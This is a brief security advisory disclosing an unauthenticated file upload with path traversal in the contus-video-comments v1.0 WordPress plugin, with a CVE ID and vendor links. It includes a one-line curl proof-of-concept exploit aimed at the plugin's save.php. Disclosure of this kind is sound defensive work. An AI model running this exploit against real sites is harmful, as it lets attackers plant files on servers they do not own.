VDB-ID: 163 Title: Unauthenticated remote .jpg file upload in contus-video-comments v1.0 wordpress plugin Vulnerability Date: 2016-06-15 Download: https://wordpress.org/plugins/contus-video-comments/ Vendor: https://profiles.wordpress.org/hdflvplayer/ Notified: 0000-00-00 Vendor Contact: Description: Video comments integrated with the standard comment system of wordpress. Vulnerability: The following code allows any user to upload .jpg files to the WordPress installation. It also allows path traversal with ../. CVE-IDs: 2016-1000112 Exploit: $ curl --data @image.jpg "http://wp-site/wp-content/plugins/contus-video-comments/save.php?id=../image" URL: http://www.vapidlabs.com/advisory.php?v= Credit: Larry W. Cashdollar, @_larry0